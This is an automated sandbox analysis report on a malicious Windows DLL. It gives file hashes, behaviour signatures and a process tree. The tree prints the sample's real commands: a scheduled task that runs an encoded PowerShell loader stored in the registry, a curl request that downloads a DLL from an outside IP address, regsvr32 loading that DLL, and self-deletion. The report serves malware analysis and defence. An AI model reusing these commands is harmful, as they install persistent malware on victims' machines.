Overview

overview

10

Static

static

1

wbroidpyUs...d0.dll

windows10-2004-x64

10

Resubmissions

07/02/2023, 14:13

230207-rjd39sfc9s 10

07/02/2023, 14:08

230207-rfx2zaca82 9

Analysis

  • max time kernel
    367s
  • max time network
    340s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/02/2023, 14:13

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll

  • Size

    143KB

  • MD5

    920625c516d7184fed4610279dd6c164

  • SHA1

    6e1fc17dd3965d707a29f0ca2ad01f693fe506b6

  • SHA256

    c1bae889da7252c8aa7c7446117a0dfd0e285621de369f5a9c204ac5662b11dd

  • SHA512

    3a6b0b7bb654384699f06db91f8bc287be128f6dc57e6fb2d19129d2557e04f311b6201a8783483790751645c0df8d702265bed7d09380019d09ceee74052058

  • SSDEEP

    3072:8uZ6hcvJTZ9oVFBfnIyht8vPs1XQHBC92ePuH:dTN4HBnI2t8vPLu6

Score
10/10
evasion

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 49 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 2 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2704
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:380
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /F /TN "{8B30B3CD-2068-4F75-AB1F-FCAE6AF928B6}" /TR " cmd /q /c start /min \"\" powershell \"$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati \"" /SC MINUTE /MO 13
            4⤵
            • Creates scheduled task(s)
            PID:1408
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C "ping localhost && DEL /F /S /Q /A "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost
              5⤵
              • Runs ping.exe
              PID:1800
      • C:\Windows\regedit.exe
        "C:\Windows\regedit.exe"
        2⤵
        • Modifies registry class
        • Runs regedit.exe
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:4748
      • C:\Windows\system32\notepad.exe
        "C:\Windows\system32\notepad.exe" "C:\Users\Admin\Desktop\reg.reg"
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1300
      • C:\Windows\system32\mmc.exe
        "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4296
      • C:\Windows\SysWOW64\WWAHost.exe
        "C:\Windows\System32\WWAHost.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C "ping localhost && copy /b /y %SystemRoot%\System32\ActivationManager.dll %appdata%\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4732
          • C:\Windows\SysWOW64\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:2284
    • C:\Windows\system32\cmd.EXE
      C:\Windows\system32\cmd.EXE /q /c start /min "" powershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand JABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAXABBAHAAaAByAG8AbgBpAGEASABhAGkAbQBhAHYAYQB0AGkALgBkAGwAbAAiADsAbQBkACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABjAHUAcgBsAC4AZQB4AGUAKQAuAFMAbwB1AHIAYwBlACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAC0AdQByAGwAIABoAHQAdABwAHMAOgAvAC8AMwA3AC4AMQAuADIAMQA1AC4AMgAyADAALwBtAGUAcwBzAGEAZwBlAHMALwBEAEIAYwBCADYAcQA5AFMATQA2ACAALQBYACAAUABPAFMAVAAgAC0ALQBpAG4AcwBlAGMAdQByAGUAIAAtAC0AbwB1AHQAcAB1AHQAIAAnACwAIAAkAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAkAHUAbgBnAGkAYQBuAHQARAB3AGEAcgBmAGUAcwB0ACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBpAGMAcgBvAHMAbwBmAHQAXABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsAFwAQQBwAGgAcgBvAG4AaQBhAEgAYQBpAG0AYQB2AGEAdABpAC4AZABsAGwAIAB8ACAAJQB7AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABfACkAfQA7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBpAGMAcgBvAHMAbwBmAHQAXABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsAFwAQQBwAGgAcgBvAG4AaQBhAEgAYQBpAG0AYQB2AGEAdABpAC4AZABsAGwAIAAtAFYAYQBsAHUAZQAgACQAdQBuAGcAaQBhAG4AdABEAHcAYQByAGYAZQBzAHQAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUAOwByAGUAZwBzAHYAcgAzADIAIAAvAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAbgBvAG4AcgBlAHMAaQBzAHQAYQBuAHQATwB1AHQAbABpAHYAZQBzAEQAaQBjAHQAYQB0AG8AcgBpAGEAbABcAEEAcABoAHIAbwBuAGkAYQBIAGEAaQBtAGEAdgBhAHQAaQAuAGQAbABsADsA
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\system32\curl.exe
            "C:\Windows\system32\curl.exe" --url https://37.1.215.220/messages/DBcB6q9SM6 -X POST --insecure --output C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
            4⤵
              PID:2076
            • C:\Windows\system32\regsvr32.exe
              "C:\Windows\system32\regsvr32.exe" /s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2292
              • C:\Windows\SysWOW64\regsvr32.exe
                /s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of WriteProcessMemory
                PID:2404

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              3KB

              MD5

              223bd4ae02766ddc32e6145fd1a29301

              SHA1

              900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

              SHA256

              1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

              SHA512

              648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              64B

              MD5

              5caad758326454b5788ec35315c4c304

              SHA1

              3aef8dba8042662a7fcf97e51047dc636b4d4724

              SHA256

              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

              SHA512

              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
              Filesize

              1.4MB

              MD5

              6e377c08962a165f90e3b7462dc99fa0

              SHA1

              7db3f47b591b1f8b1276b14140ff77257fcaa286

              SHA256

              d4756faf2fec6ff50903d239dfc28a4f534c4e28099ccadf136b52eee9e13e68

              SHA512

              70fc5c6cf2c757c93ca7dd33d20327139fddd15803cda0d4f2cbc673fa5431a96275ba9ece82377e823b76e7becabf1cc63b593a1752124dcd6e8fedf5696542

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
              Filesize

              1.0MB

              MD5

              46808efd5331489a931e51792623caca

              SHA1

              1e7e75bcee397e9c447edb7a7a20a5c81eee8a87

              SHA256

              59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1

              SHA512

              33fcf014dba7718a7e99a4860854b6067e525c8e1ab187dd9468fd4913fe7fe450b89beb5c915e424288857ce6137f96ef970d26b9bd061991d1d6a97e63b853

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
              Filesize

              1.0MB

              MD5

              46808efd5331489a931e51792623caca

              SHA1

              1e7e75bcee397e9c447edb7a7a20a5c81eee8a87

              SHA256

              59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1

              SHA512

              33fcf014dba7718a7e99a4860854b6067e525c8e1ab187dd9468fd4913fe7fe450b89beb5c915e424288857ce6137f96ef970d26b9bd061991d1d6a97e63b853

              Download Submit

            • C:\Users\Admin\Desktop\reg.reg
              Filesize

              4KB

              MD5

              20706974cd5e49fc4884aadafec40a92

              SHA1

              3455618aa35e016cf696159db1805b3217e5b90e

              SHA256

              acee8d2a27fb2d41fa6612ab732996fe00337f5391959399a1daa3161b23e2fa

              SHA512

              470c1ef90e385164250b3d1ad89556a32eccb537dc71eba7b49b70858c47039f491255e4a4b750783bea98886a798ee17de4006878a9a6789fa297a89f3d4c78

              Download Submit

            • memory/1544-161-0x00000000008E0000-0x00000000008EC000-memory.dmp

              Filesize

              48KB

              Download

            • memory/1544-165-0x00000000008E0000-0x00000000008EC000-memory.dmp

              Filesize

              48KB

              Download

            • memory/2264-148-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2264-154-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2264-150-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4296-136-0x00000000005F0000-0x00000000005F7000-memory.dmp

              Filesize

              28KB

              Download

            • memory/4296-142-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4296-140-0x000000001EBBA000-0x000000001EBBF000-memory.dmp

              Filesize

              20KB

              Download

            • memory/4296-141-0x0000000021620000-0x0000000021623000-memory.dmp

              Filesize

              12KB

              Download

            • memory/4296-139-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4296-135-0x00000000005E0000-0x00000000005E5000-memory.dmp

              Filesize

              20KB

              Download

            • memory/4928-145-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4928-144-0x00000176CA290000-0x00000176CA2B2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4928-159-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4928-149-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp

              Filesize

              10.8MB

              Download